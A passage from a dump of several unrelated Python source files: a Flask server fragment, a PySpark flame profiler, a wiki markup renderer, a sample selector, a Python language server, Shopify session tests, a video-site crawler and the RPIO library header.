request_processor = ModelRequestProcessor(request_data)
return request_processor.get_response()
if __name__ == '__main__':
before_all(PORT)
init_thread = threading.Thread(target=initialize_all)
init_thread.start()
app.run(host="0.0.0.0", port=PORT, debug=True)
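# Example requests against the two routes above (illustrative only; the JSON
# body shape is defined by PredictRequestProcessor / ModelRequestProcessor,
# which are not shown in this file):
#   curl -X POST http://localhost:80/predict -H 'Content-Type: application/json' -d '{...}'
#   curl -X PUT  http://localhost:80/model   -H 'Content-Type: application/json' -d '{...}'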
|
__init__.py
|
from collections import defaultdict
from pyspark import AccumulatorParam
from pyspark.profiler import Profiler
from os.path import join
from threading import Thread, Event
from sys import _current_frames
def extract_stack(frame):
result = []
while frame is not None:
result.append((
frame.f_code.co_filename,
frame.f_code.co_name,
frame.f_lineno
))
frame = frame.f_back
return tuple(reversed(result))
class Collector(object):
def __init__(self, interval=0.01):
self.interval = interval
self.finished = Event()
def start(self):
self.thread = Thread(target=self.run)
self.thread.start()
def stop(self):
self.finished.set()
self.thread.join()
def run(self):
results = defaultdict(int)
self.results = results
this_thread = self.thread.ident
while True:
self.finished.wait(self.interval)
if self.finished.is_set():
return
results = self.results
frames = _current_frames()
for frame_id, frame in frames.items():
if frame_id != this_thread:
stack = extract_stack(frame)
results[stack] += 1
class ResultsAccumulator(AccumulatorParam):
def zero(self, value):
return defaultdict(int)
def addInPlace(self, a, b):
for stack, count in b.items():
a[stack] += count
return a
class FlameProfiler(Profiler):
def __init__(self, ctx):
self.interval = float(ctx.environment.get('pyspark_flame.interval', 0.05))
self._accumulator = ctx.accumulator(defaultdict(int), ResultsAccumulator())
def profile(self, func):
collector = Collector(self.interval)
collector.start()
try:
func()
finally:
collector.stop()
self._accumulator.add(collector.results)
def stats(self):
return self._accumulator.value
def show(self, id):
print "Flame Data for RDD {}".format(id)
print self.format()
def dump(self, id, path):
with open(join(path, 'rdd-{}.flame'.format(id)), 'w') as f:
f.write(self.format())
def format(self):
return ''.join(
'{stack} {count}\n'.format(stack=';'.join(
'{file}:{method}:{line}'.format(file=file_, method=method, line=line)
for file_, method, line in stack
), count=count)
for stack, count in self.stats().items()
)
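# Usage sketch (assumptions: PySpark's standard custom-profiler hooks; the
# sampling interval is read from SparkContext's `environment` dict above):
#   from pyspark import SparkConf, SparkContext
#   conf = SparkConf().set('spark.python.profile', 'true')
#   sc = SparkContext(conf=conf, profiler_cls=FlameProfiler,
#                     environment={'pyspark_flame.interval': 0.01})
#   sc.parallelize(range(1000)).map(lambda x: x * x).count()
#   sc.dump_profiles('/tmp/flame')  # writes rdd-<id>.flame files via dump() above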
|
mark.py
|
from .set_mark.namumark import namumark
from .set_mark.markdown import markdown
from .set_mark.tool import *
import re
import html
import sqlite3
import urllib.parse
import threading
import multiprocessing
def load_conn2(data):
global conn
global curs
conn = data
curs = conn.cursor()
def send_parser(data):
if not re.search('^<br>$', data):
data = html.escape(data)
javascript = re.compile('javascript:', re.I)
data = javascript.sub('', data)
while 1:
re_data = re.search('<a(?: (?:(?:(?!>).)*))?>(?P<in>(?:(?!<).)*)<\/a>', data)
if re_data:
re_data = re_data.groups()[0]
data = re.sub('<a(?: (?:(?:(?!>).)*))?>(?P<in>(?:(?!<).)*)<\/a>', '<a href="/w/' + urllib.parse.quote(re_data).replace('/','%2F') + '">' + re_data + '</a>', data, 1)
else:
break
return data
def plusing(data):
for data_in in data:
curs.execute(db_change("select title from back where title = ? and link = ? and type = ?"), [data_in[1], data_in[0], data_in[2]])
if not curs.fetchall():
curs.execute(db_change("insert into back (title, link, type) values (?, ?, ?)"), [data_in[1], data_in[0], data_in[2]])
def render_do(title, data, num, include):
curs.execute(db_change('select data from other where name = "markup"'))
rep_data = curs.fetchall()
if rep_data[0][0] == 'namumark':
data = namumark(conn, data, title, num, include)
elif rep_data[0][0] == 'markdown':
data = markdown(conn, data, title, num)
elif rep_data[0][0] == 'raw':
data = [data, '', []]
else:
data = ['', '', []]
if num == 1:
data_num = len(data[2])
data_in_num = int(data_num / multiprocessing.cpu_count())
data_in = []
for i in range(multiprocessing.cpu_count()):
if i != multiprocessing.cpu_count() - 1:
data_in += [data[2][data_in_num * i:data_in_num * (i + 1)]]
else:
data_in += [data[2][data_in_num * i:]]
for data_in_for in data_in:
thread_start = threading.Thread(target = plusing, args = [data_in_for])
thread_start.start()
thread_start.join()
conn.commit()
if num == 2:
return [data[0], data[1]]
else:
return data[0] + data[1]
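# Usage sketch (assumptions inferred from the branches above: num == 1 renders
# and records backlinks, num == 2 returns [body, footer], other values return
# the joined string; `raw_markup` stands for the page's wiki source text and
# the empty `include` argument is only forwarded to namumark):
#   load_conn2(sqlite3.connect('wiki.db'))
#   html_out = render_do('FrontPage', raw_markup, 1, '')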
|
sample_selector.py
|
#!/usr/bin/env python
__author__ = 'Florian Hase'
#========================================================================
import numpy as np
from multiprocessing import Process, Queue
from Utils.utils import VarDictParser
#========================================================================
class SampleSelector(VarDictParser):
def __init__(self, var_dicts):
VarDictParser.__init__(self, var_dicts)
self.total_size = 0
self.var_sizes = []
self.var_names = []
for var_dict in self.var_dicts:
self.total_size += var_dict[list(var_dict)[0]]['size']
self.var_sizes.append(int(var_dict[list(var_dict)[0]]['size']))
self.var_names.append(list(var_dict)[0])
def _compute_rewards_per_batch(self, batch_index, queue):
proposals = self.proposals[batch_index]
rewards = np.empty(len(proposals))
for sample_index, sample in enumerate(proposals):
num, den = self.penalty_contribs(sample)
penalty = (num + self.lambda_values[batch_index]) / den
rewards[sample_index] = np.exp( - penalty)
rewards = np.array(rewards)
queue.put({batch_index: rewards})
def _compute_rewards(self):
q = Queue()
processes = []
for batch_index in range(self.batch_size):
process = Process(target = self._compute_rewards_per_batch, args = (batch_index, q))
processes.append(process)
process.start()
for process in processes:
process.join()
result_dict = {}
while not q.empty():
results = q.get()
for key, value in results.items():
result_dict[key] = value
rewards = [result_dict[batch_index] for batch_index in range(self.batch_size)]
for reward_index, reward in enumerate(rewards):
setattr(self, 'rewards_%d' % reward_index, np.array(reward))
def select(self, num_samples, proposals, penalty_contribs, lambda_values, characteristic_distances):
self.num_samples = num_samples
self.proposals = proposals
self.penalty_contribs = penalty_contribs
self.lambda_values = lambda_values
self.characteristic_distances = characteristic_distances
self.batch_size = len(self.lambda_values)
self._compute_rewards()
# now we collect the samples
all_samples = []
proposal_copy = np.copy(self.proposals)
for sample_index in range(num_samples):
new_samples = []
for batch_index in range(self.batch_size):
batch_proposals = proposal_copy[batch_index]
# compute diversity punishments
div_crits = np.ones(len(batch_proposals))
if len(new_samples) > 0:
for sample_index, sample in enumerate(batch_proposals):
# min_distance = np.amin([np.linalg.norm(sample - x) for x in new_samples])
# min_distance = np.amin([np.linalg.norm(sample - x) for x in new_samples], axis = 0)
min_distance = np.amin([np.abs(sample - x) for x in new_samples], axis = 0)
div_crits[sample_index] = np.amin([1., np.amin(np.exp( 2. * (min_distance - self.characteristic_distances) / self.var_p_ranges))])
# get reweighted rewards
rewards = getattr(self, 'rewards_%d' % batch_index)
reweighted_rewards = div_crits * rewards
# reweighted_rewards = rewards
largest_reward_index = np.argmax(reweighted_rewards)
new_sample = batch_proposals[largest_reward_index]
new_samples.append(new_sample)
# update reward of picked sample
rewards[largest_reward_index] = 0.
setattr(self, 'rewards_%d' % batch_index, rewards)
# quit()
all_samples.append(np.array(new_samples))
all_samples = np.array(all_samples)
return all_samples
|
python_ls.py
|
# Copyright 2017 Palantir Technologies, Inc.
from functools import partial
import logging
import os
import socketserver
import threading
from .plugins.jedi_completion import pyls_completions
import napkin
from pyls_jsonrpc.dispatchers import MethodDispatcher
from pyls_jsonrpc.endpoint import Endpoint
from pyls_jsonrpc.streams import JsonRpcStreamReader, JsonRpcStreamWriter
from . import lsp, _utils, uris
from .config import config
from .workspace import Workspace
log = logging.getLogger(__name__)
LINT_DEBOUNCE_S = 0.5 # 500 ms
PARENT_PROCESS_WATCH_INTERVAL = 10 # 10 s
MAX_WORKERS = 64
PYTHON_FILE_EXTENSIONS = ('.py', '.pyi')
CONFIG_FILEs = ('pycodestyle.cfg', 'setup.cfg', 'tox.ini', '.flake8')
class _StreamHandlerWrapper(socketserver.StreamRequestHandler, object):
"""A wrapper class that is used to construct a custom handler class."""
delegate = None
def setup(self):
super(_StreamHandlerWrapper, self).setup()
# pylint: disable=no-member
self.delegate = self.DELEGATE_CLASS(self.rfile, self.wfile)
def handle(self):
try:
self.delegate.start()
except OSError as e:
if os.name == 'nt':
# Catch and pass on ConnectionResetError when parent process
# dies
# pylint: disable=no-member, undefined-variable
if isinstance(e, WindowsError) and e.winerror == 10054:
pass
# pylint: disable=no-member
self.SHUTDOWN_CALL()
def start_tcp_lang_server(bind_addr, port, check_parent_process, handler_class):
if not issubclass(handler_class, PythonLanguageServer):
raise ValueError(
'Handler class must be an instance of PythonLanguageServer')
def shutdown_server(check_parent_process, *args):
# pylint: disable=unused-argument
if check_parent_process:
log.debug('Shutting down server')
# Shutdown call must be done on a thread, to prevent deadlocks
stop_thread = threading.Thread(target=server.shutdown)
stop_thread.start()
# Construct a custom wrapper class around the user's handler_class
wrapper_class = type(
handler_class.__name__ + 'Handler',
(_StreamHandlerWrapper,),
{'DELEGATE_CLASS': partial(handler_class,
check_parent_process=check_parent_process),
'SHUTDOWN_CALL': partial(shutdown_server, check_parent_process)}
)
server = socketserver.TCPServer((bind_addr, port), wrapper_class,
bind_and_activate=False)
server.allow_reuse_address = True
try:
server.server_bind()
server.server_activate()
log.info('Serving %s on (%s, %s)', handler_class.__name__, bind_addr,
port)
server.serve_forever()
finally:
log.info('Shutting down')
server.server_close()
def start_io_lang_server(rfile, wfile, check_parent_process, handler_class):
if not issubclass(handler_class, PythonLanguageServer):
raise ValueError(
'Handler class must be an instance of PythonLanguageServer')
log.info('Starting %s IO language server', handler_class.__name__)
server = handler_class(rfile, wfile, check_parent_process)
server.start()
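# Usage sketch for the two entry points above (hedged: real deployments drive
# these through the package's CLI, which lives outside this file; `sys` would
# need to be imported, and the TCP port shown is arbitrary):
#   start_io_lang_server(sys.stdin.buffer, sys.stdout.buffer, False,
#                        PythonLanguageServer)
#   start_tcp_lang_server('127.0.0.1', 2087, False, PythonLanguageServer)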
class PythonLanguageServer(MethodDispatcher):
""" Implementation of the Microsoft VSCode Language Server Protocol
https://github.com/Microsoft/language-server-protocol/blob/master/versions/protocol-1-x.md
"""
# pylint: disable=too-many-public-methods,redefined-builtin
def __init__(self, rx, tx, check_parent_process=False):
self.workspace = None
self.config = None
self.root_uri = None
self.watching_thread = None
self.workspaces = {}
self.uri_workspace_mapper = {}
self._jsonrpc_stream_reader = JsonRpcStreamReader(rx)
self._jsonrpc_stream_writer = JsonRpcStreamWriter(tx)
self._check_parent_process = check_parent_process
self._endpoint = Endpoint(self, self._jsonrpc_stream_writer.write,
max_workers=MAX_WORKERS)
self._dispatchers = []
self._shutdown = False
def start(self):
"""Entry point for the server."""
self._jsonrpc_stream_reader.listen(self._endpoint.consume)
def __getitem__(self, item):
"""Override getitem to fallback through multiple dispatchers."""
if self._shutdown and item != 'exit':
# exit is the only allowed method during shutdown
log.debug("Ignoring non-exit method during shutdown: %s", item)
raise KeyError
try:
return super(PythonLanguageServer, self).__getitem__(item)
except KeyError:
# Fallback through extra dispatchers
for dispatcher in self._dispatchers:
try:
return dispatcher[item]
except KeyError:
continue
raise KeyError()
def m_shutdown(self, **_kwargs):
self._shutdown = True
return None
def m_exit(self, **_kwargs):
self._endpoint.shutdown()
self._jsonrpc_stream_reader.close()
self._jsonrpc_stream_writer.close()
def _match_uri_to_workspace(self, uri):
workspace_uri = _utils.match_uri_to_workspace(uri, self.workspaces)
return self.workspaces.get(workspace_uri, self.workspace)
def _hook(self, hook_name, doc_uri=None, **kwargs):
"""Calls hook_name and returns a list of results from all registered handlers"""
workspace = self._match_uri_to_workspace(doc_uri)
doc = workspace.get_document(doc_uri) if doc_uri else None
hook_handlers = self.config.plugin_manager.subset_hook_caller(hook_name,
self.config.disabled_plugins)
return hook_handlers(config=self.config, workspace=workspace,
document=doc, **kwargs)
def capabilities(self):
server_capabilities = {
'codeActionProvider': False, # OFF
'codeLensProvider': None, # OFF
# 'completionProvider': None, # OFF
'completionProvider': {
'resolveProvider': False, # We know everything ahead of time
'triggerCharacters': ['.']
},
# 'documentFormattingProvider': True,
'documentFormattingProvider': False,
'documentHighlightProvider': True,
'documentRangeFormattingProvider': True,
'documentSymbolProvider': False,
'definitionProvider': True,
'executeCommandProvider': None,
# 'executeCommandProvider': {
# 'commands': flatten(self._hook('pyls_commands'))
# },
'hoverProvider': True,
'referencesProvider': True,
'renameProvider': False,
'foldingRangeProvider': True,
# 'signatureHelpProvider': {
# 'triggerCharacters': ['(', ',', '=']
# },
'signatureHelpProvider': None,
'textDocumentSync': {
'change': lsp.TextDocumentSyncKind.INCREMENTAL,
'save': {
'includeText': True,
},
'openClose': True,
},
'workspace': {
'workspaceFolders': {
'supported': False,
'changeNotifications': True
}
},
'experimental': merge(self._hook('pyls_experimental_capabilities'))
}
log.info('Server capabilities: %s', server_capabilities)
return server_capabilities
def m_initialize(self, processId=None, rootUri=None, rootPath=None,
initializationOptions=None, **_kwargs):
log.debug('Language server initialized with %s %s %s %s', processId,
rootUri, rootPath, initializationOptions)
if rootUri is None:
rootUri = uris.from_fs_path(
rootPath) if rootPath is not None else ''
self.workspaces.pop(self.root_uri, None)
self.root_uri = rootUri
self.config = config.Config(rootUri, initializationOptions or {},
processId, _kwargs.get('capabilities', {}))
self.workspace = Workspace(rootUri, self._endpoint, self.config)
self.workspaces[rootUri] = self.workspace
self._dispatchers = self._hook('pyls_dispatchers')
self._hook('pyls_initialize')
# Get our capabilities
return {'capabilities': self.capabilities()}
def m_initialized(self, **_kwargs):
self._hook('pyls_initialized')
def code_actions(self, doc_uri, range, context):
return flatten(self._hook('pyls_code_actions', doc_uri, range=range,
context=context))
def code_lens(self, doc_uri):
return flatten(self._hook('pyls_code_lens', doc_uri))
def completions(self, doc_uri, position):
completions = self._hook('pyls_completions', doc_uri, position=position)
return {
'isIncomplete': False,
'items': flatten(completions)
}
def definitions(self, doc_uri, position):
return flatten(
self._hook('pyls_definitions', doc_uri, position=position))
def document_symbols(self, doc_uri):
return flatten(self._hook('pyls_document_symbols', doc_uri))
def execute_command(self, command, arguments):
return self._hook('pyls_execute_command', command=command,
arguments=arguments)
def format_document(self, doc_uri):
return self._hook('pyls_format_document', doc_uri)
def format_range(self, doc_uri, range):
return self._hook('pyls_format_range', doc_uri, range=range)
def highlight(self, doc_uri, position):
return flatten(self._hook('pyls_document_highlight', doc_uri,
position=position)) or None
def hover(self, doc_uri, position):
return self._hook('pyls_hover', doc_uri, position=position) or {
'contents': ''}
@_utils.debounce(LINT_DEBOUNCE_S, keyed_by='doc_uri')
def lint(self, doc_uri, is_saved):
# Since we're debounced, the document may no longer be open
workspace = self._match_uri_to_workspace(doc_uri)
if doc_uri in workspace.documents:
workspace.publish_diagnostics(
doc_uri,
flatten(self._hook('pyls_lint', doc_uri, is_saved=is_saved))
)
def references(self, doc_uri, position, exclude_declaration):
return flatten(self._hook(
'pyls_references', doc_uri, position=position,
exclude_declaration=exclude_declaration
))
def rename(self, doc_uri, position, new_name):
return self._hook('pyls_rename', doc_uri, position=position,
new_name=new_name)
def signature_help(self, doc_uri, position):
return self._hook('pyls_signature_help', doc_uri, position=position)
def folding(self, doc_uri):
return flatten(self._hook('pyls_folding_range', doc_uri))
def m_text_document__did_close(self, textDocument=None, **_kwargs):
workspace = self._match_uri_to_workspace(textDocument['uri'])
workspace.rm_document(textDocument['uri'])
def m_text_document__did_open(self, textDocument=None, **_kwargs):
workspace = self._match_uri_to_workspace(textDocument['uri'])
workspace.put_document(textDocument['uri'], textDocument['text'],
version=textDocument.get('version'))
self._hook('pyls_document_did_open', textDocument['uri'])
self.lint(textDocument['uri'], is_saved=True)
def m_text_document__did_change(self, contentChanges=None,
textDocument=None, **_kwargs):
workspace = self._match_uri_to_workspace(textDocument['uri'])
for change in contentChanges:
workspace.update_document(
textDocument['uri'],
change,
version=textDocument.get('version')
)
self.lint(textDocument['uri'], is_saved=False)
def m_text_document__did_save(self, textDocument=None, **_kwargs):
self.lint(textDocument['uri'], is_saved=True)
def m_text_document__code_action(self, textDocument=None, range=None,
context=None, **_kwargs):
return self.code_actions(textDocument['uri'], range, context)
def m_text_document__code_lens(self, textDocument=None, **_kwargs):
return self.code_lens(textDocument['uri'])
def m_text_document__completion(self, textDocument=None, position=None,
**_kwargs):
return self.completions(textDocument['uri'], position)
def m_text_document__definition(self, textDocument=None, position=None,
**_kwargs):
return self.definitions(textDocument['uri'], position)
def m_text_document__document_highlight(self, textDocument=None,
position=None, **_kwargs):
return self.highlight(textDocument['uri'], position)
def m_text_document__hover(self, textDocument=None, position=None,
**_kwargs):
return self.hover(textDocument['uri'], position)
def m_text_document__document_symbol(self, textDocument=None, **_kwargs):
return self.document_symbols(textDocument['uri'])
def m_text_document__formatting(self, textDocument=None, _options=None,
**_kwargs):
# For now we're ignoring formatting options.
return self.format_document(textDocument['uri'])
def m_text_document__rename(self, textDocument=None, position=None,
newName=None, **_kwargs):
return self.rename(textDocument['uri'], position, newName)
def m_text_document__folding_range(self, textDocument=None, **_kwargs):
return self.folding(textDocument['uri'])
def m_text_document__range_formatting(self, textDocument=None, range=None,
_options=None, **_kwargs):
# Again, we'll ignore formatting options for now.
return self.format_range(textDocument['uri'], range)
def m_text_document__references(self, textDocument=None, position=None,
context=None, **_kwargs):
exclude_declaration = not context['includeDeclaration']
return self.references(textDocument['uri'], position,
exclude_declaration)
def m_text_document__signature_help(self, textDocument=None, position=None,
**_kwargs):
return self.signature_help(textDocument['uri'], position)
def m_workspace__did_change_configuration(self, settings=None):
self.config.update((settings or {}).get('pyls', {}))
for workspace_uri in self.workspaces:
workspace = self.workspaces[workspace_uri]
workspace.update_config(settings)
for doc_uri in workspace.documents:
self.lint(doc_uri, is_saved=False)
def m_workspace__did_change_workspace_folders(self, event=None,
**_kwargs): # pylint: disable=too-many-locals
if event is None:
return
added = event.get('added', [])
removed = event.get('removed', [])
for removed_info in removed:
if 'uri' in removed_info:
removed_uri = removed_info['uri']
self.workspaces.pop(removed_uri, None)
for added_info in added:
if 'uri' in added_info:
added_uri = added_info['uri']
workspace_config = config.Config(
added_uri, self.config._init_opts,
self.config._process_id, self.config._capabilities)
workspace_config.update(self.config._settings)
self.workspaces[added_uri] = Workspace(
added_uri, self._endpoint, workspace_config)
root_workspace_removed = any(
removed_info['uri'] == self.root_uri for removed_info in removed)
workspace_added = len(added) > 0 and 'uri' in added[0]
if root_workspace_removed and workspace_added:
added_uri = added[0]['uri']
self.root_uri = added_uri
new_root_workspace = self.workspaces[added_uri]
self.config = new_root_workspace._config
self.workspace = new_root_workspace
elif root_workspace_removed:
# NOTE: Removing the root workspace can only happen when the server
# is closed, thus the else condition of this if can never happen.
if self.workspaces:
log.debug('Root workspace deleted!')
available_workspaces = sorted(self.workspaces)
first_workspace = available_workspaces[0]
new_root_workspace = self.workspaces[first_workspace]
self.root_uri = first_workspace
self.config = new_root_workspace._config
self.workspace = new_root_workspace
# Migrate documents that are on the root workspace and have a better
# match now
doc_uris = list(self.workspace._docs.keys())
for uri in doc_uris:
doc = self.workspace._docs.pop(uri)
new_workspace = self._match_uri_to_workspace(uri)
new_workspace._docs[uri] = doc
def m_workspace__did_change_watched_files(self, changes=None, **_kwargs):
changed_py_files = set()
config_changed = False
for d in (changes or []):
if d['uri'].endswith(PYTHON_FILE_EXTENSIONS):
changed_py_files.add(d['uri'])
elif d['uri'].endswith(CONFIG_FILEs):
config_changed = True
if config_changed:
self.config.settings.cache_clear()
elif not changed_py_files:
# Only externally changed python files and lint configs may result in changed diagnostics.
return
for workspace_uri in self.workspaces:
workspace = self.workspaces[workspace_uri]
for doc_uri in workspace.documents:
# Changes in doc_uri are already handled by m_text_document__did_save
if doc_uri not in changed_py_files:
self.lint(doc_uri, is_saved=False)
def m_workspace__execute_command(self, command=None, arguments=None):
return self.execute_command(command, arguments)
def flatten(list_of_lists):
return [item for lst in list_of_lists for item in lst]
def merge(list_of_dicts):
return {k: v for dictionary in list_of_dicts for k, v in dictionary.items()}
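# Illustrative examples (not part of pyls) of how the two helpers above combine
# hook results: flatten() concatenates the per-plugin lists returned by hooks such
# as pyls_completions, and merge() folds dict-returning hooks such as
# pyls_experimental_capabilities into a single mapping. The plugin names and
# payloads below are made up.
#
# >>> flatten([[{'label': 'os'}], [{'label': 'sys'}]])
# [{'label': 'os'}, {'label': 'sys'}]
# >>> merge([{'pluginA': True}, {'pluginB': {'setting': 1}}])
# {'pluginA': True, 'pluginB': {'setting': 1}}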
|
base_test.py
|
import shopify
from test.test_helper import TestCase
from pyactiveresource.activeresource import ActiveResource
from mock import patch
import threading
class BaseTest(TestCase):
@classmethod
def setUpClass(cls):
shopify.ApiVersion.define_known_versions()
shopify.ApiVersion.define_version(shopify.Release("2019-04"))
cls.session1 = shopify.Session("shop1.myshopify.com", "unstable", "token1")
cls.session2 = shopify.Session("shop2.myshopify.com", "2019-04", "token2")
@classmethod
def tearDownClass(cls):
shopify.ApiVersion.clear_defined_versions()
def setUp(self):
super(BaseTest, self).setUp()
def tearDown(self):
shopify.ShopifyResource.clear_session()
def test_activate_session_should_set_site_and_headers_for_given_session(self):
shopify.ShopifyResource.activate_session(self.session1)
self.assertIsNone(ActiveResource.site)
self.assertEqual("https://shop1.myshopify.com/admin/api/unstable", shopify.ShopifyResource.site)
self.assertEqual("https://shop1.myshopify.com/admin/api/unstable", shopify.Shop.site)
self.assertIsNone(ActiveResource.headers)
self.assertEqual("token1", shopify.ShopifyResource.headers["X-Shopify-Access-Token"])
self.assertEqual("token1", shopify.Shop.headers["X-Shopify-Access-Token"])
def test_activate_session_should_set_site_given_version(self):
shopify.ShopifyResource.activate_session(self.session2)
self.assertIsNone(ActiveResource.site)
self.assertEqual("https://shop2.myshopify.com/admin/api/2019-04", shopify.ShopifyResource.site)
self.assertEqual("https://shop2.myshopify.com/admin/api/2019-04", shopify.Shop.site)
self.assertIsNone(ActiveResource.headers)
def test_clear_session_should_clear_site_and_headers_from_base(self):
shopify.ShopifyResource.activate_session(self.session1)
shopify.ShopifyResource.clear_session()
self.assertIsNone(ActiveResource.site)
self.assertIsNone(shopify.ShopifyResource.site)
self.assertIsNone(shopify.Shop.site)
self.assertIsNone(ActiveResource.headers)
self.assertFalse("X-Shopify-Access-Token" in shopify.ShopifyResource.headers)
self.assertFalse("X-Shopify-Access-Token" in shopify.Shop.headers)
def test_activate_session_with_one_session_then_clearing_and_activating_with_another_session_should_request_to_correct_shop(
self,
):
shopify.ShopifyResource.activate_session(self.session1)
shopify.ShopifyResource.clear_session()
shopify.ShopifyResource.activate_session(self.session2)
self.assertIsNone(ActiveResource.site)
self.assertEqual("https://shop2.myshopify.com/admin/api/2019-04", shopify.ShopifyResource.site)
self.assertEqual("https://shop2.myshopify.com/admin/api/2019-04", shopify.Shop.site)
self.assertIsNone(ActiveResource.headers)
self.assertEqual("token2", shopify.ShopifyResource.headers["X-Shopify-Access-Token"])
self.assertEqual("token2", shopify.Shop.headers["X-Shopify-Access-Token"])
def test_delete_should_send_custom_headers_with_request(self):
shopify.ShopifyResource.activate_session(self.session1)
org_headers = shopify.ShopifyResource.headers
shopify.ShopifyResource.set_headers({"X-Custom": "abc"})
with patch("shopify.ShopifyResource.connection.delete") as mock:
url = shopify.ShopifyResource._custom_method_collection_url("1", {})
shopify.ShopifyResource.delete("1")
mock.assert_called_with(url, {"X-Custom": "abc"})
shopify.ShopifyResource.set_headers(org_headers)
def test_headers_includes_user_agent(self):
self.assertTrue("User-Agent" in shopify.ShopifyResource.headers)
t = threading.Thread(target=lambda: self.assertTrue("User-Agent" in shopify.ShopifyResource.headers))
t.start()
t.join()
def test_headers_is_thread_safe(self):
def testFunc():
shopify.ShopifyResource.headers["X-Custom"] = "abc"
self.assertTrue("X-Custom" in shopify.ShopifyResource.headers)
t1 = threading.Thread(target=testFunc)
t1.start()
t1.join()
t2 = threading.Thread(target=lambda: self.assertFalse("X-Custom" in shopify.ShopifyResource.headers))
t2.start()
t2.join()
def test_setting_with_user_and_pass_strips_them(self):
shopify.ShopifyResource.clear_session()
self.fake(
"shop",
url="https://this-is-my-test-show.myshopify.com/admin/shop.json",
method="GET",
body=self.load_fixture("shop"),
headers={"Authorization": "Basic dXNlcjpwYXNz"},
)
API_KEY = "user"
PASSWORD = "pass"
shop_url = "https://%s:%s@this-is-my-test-show.myshopify.com/admin" % (API_KEY, PASSWORD)
shopify.ShopifyResource.set_site(shop_url)
res = shopify.Shop.current()
self.assertEqual("Apple Computers", res.name)
|
crawl.py
|
#!/usr/bin/env python2
import re
import urllib2
import httplib
from bs4 import BeautifulSoup
import dao
import string
from threading import Thread
import sys
import json
import traceback
import js2py
import downloader
def getDocSoup(url, cookie=""):
try:
opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', cookie))
doc = opener.open(url).read()
except httplib.IncompleteRead, e:
doc = e.partial
return BeautifulSoup(doc, "lxml")
def compoundUrl(root, path):
if not path.startswith("http"):
urlRootIndex = root.find("/", 9)
if urlRootIndex != -1:
root = root[:urlRootIndex]
path = root + path
return path
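# Illustrative examples (not part of the original script): compoundUrl() leaves
# absolute links untouched and resolves site-relative paths against the root's
# scheme + host (find("/", 9) skips past the "http://" / "https://" prefix).
# The URLs below are made-up placeholders.
#
# >>> compoundUrl("https://example.com/videos?page=2", "/watch/123")
# 'https://example.com/watch/123'
# >>> compoundUrl("https://example.com/videos", "http://other.example/clip")
# 'http://other.example/clip'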
def getVidUrl(link, url, nameExtractor, durationExtractor):
try:
vidurl = link.get("href")
error = False
if vidurl is None:
vidurl = link["u"]
name = link["t"]
durString = link["d"]
vidurl = compoundUrl(url, vidurl)
print vidurl
else:
vidurl = compoundUrl(url, vidurl)
print vidurl
name = eval(nameExtractor)
print "\tname: " + name
durString = eval(durationExtractor)
name = str(filter(lambda x: x in set(string.printable), name))
duration = int(re.sub("[^\\d]", "", durString))
print "\tduration: " + str(duration)
if duration not in range(10, 25) or dao.isBlackListed(
name.split(" ")):
print "\t--Duration/name check failed"
error = True
return {"url": str(vidurl), "error": error}
except:
print >> sys.stderr, "GU error " + vidurl
raise
def dateTagCheck(dateCheck, tagsExtractor, vidpage):
try:
error = False
tags = []
for tag in vidpage.select(tagsExtractor):
tags.append(tag.get_text())
if not eval(dateCheck) and dao.isBlackListed(tags):
print "\t--Date/tag check failed"
error = True
return error
except:
print >> sys.stderr, "DT error"
raise
def getLinks(urlid, url, linkExtractor, nameExtractor, durationExtractor, dateCheck, tagsExtractor):
try:
rootpage = getDocSoup(url)
vidlinks = eval(linkExtractor)
if len(vidlinks) == 0:
try:
cookie = js2py.eval_js(re.sub(".*<!--", "", re.sub("//-->.*", "",
rootpage.get_text().replace("document.cookie=",
"return ").replace(
"document.location.reload(true);", "").replace(
"Loading ...", ""))) + " go()")
rootpage = getDocSoup(url, cookie)
vidlinks = eval(linkExtractor)
except:
pass
if len(vidlinks) == 0:
print >> sys.stderr, "NO VIDEOS FOUND: " + url
return
except (urllib2.HTTPError, urllib2.URLError), e:
print >> sys.stderr, "GL " + type(e).__name__ + " " + str(e) + " " + url
return
for link in vidlinks:
try:
vidtest = getVidUrl(link, url, nameExtractor, durationExtractor)
vidurl = vidtest["url"]
error = vidtest["error"]
if dao.vidStatus(vidurl) == -1:
dao.addUrl(urlid, vidurl, 0 if error else 1)
else:
print "\t--Duplicate video"
except Exception, e:
print >> sys.stderr, "GL " + type(e).__name__ + " " + str(e) + " " + url
status = dao.vidStatus(url)
if status == 1:
if not dateTagCheck(dateCheck, tagsExtractor, rootpage):
print "***\t" + vidurl
else:
status = 0
dao.addUrl(urlid, url, status + 2)
def startCrawl(urlid, url, linkExtractor, nameExtractor, durationExtractor, dateCheck, tagsExtractor):
while True:
dao.clean()
url = dao.getResumeUrl(urlid, url)
print "Starting crawl: " + url
try:
getLinks(urlid, url, linkExtractor, nameExtractor, durationExtractor, dateCheck, tagsExtractor)
except Exception, e:
print >> sys.stderr, "SC " + type(e).__name__ + " " + str(e) + " " + url
traceback.print_exc()
print "Finished crawl: " + url
if __name__ == "__main__":
threads = []
sites = dao.getSites()
threadMultiplier = 1
try:
threadMultiplier = int(sys.argv[1])
except IndexError:
pass
for i in range(0, threadMultiplier):
for site in sites:
# for site in (sites[4],):
t = Thread(target=startCrawl, args=(site[0], site[1], site[2], site[3], site[4], site[5], site[6]))
t.setDaemon(True)
t.start()
threads.append(t)
running = True
while running:
running = False
for t in threads:
if t.isAlive():
running = True
break
|
_RPIO.py
|
# -*- coding: utf-8 -*-
#
# This file is part of RPIO.
#
# Copyright
#
# Copyright (C) 2013 Chris Hager <chris@linuxuser.at>
#
# License
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details at
# <http://www.gnu.org/licenses/lgpl-3.0-standalone.html>
#
# Documentation
#
# http://pythonhosted.org/RPIO
#
import socket
import select
import os.path
import time
import atexit
from logging import debug, info, warn, error
from threading import Thread
from functools import partial
from itertools import chain
import RPIO
import RPIO._GPIO as _GPIO
# Internals
_SYS_GPIO_ROOT = '/sys/class/gpio/'
_TCP_SOCKET_HOST = "0.0.0.0"
GPIO_FUNCTIONS = {0: "OUTPUT", 1: "INPUT", 4: "ALT0", 6: "ALT2", 7: "-"}
_PULL_UPDN = ("PUD_OFF", "PUD_DOWN", "PUD_UP")
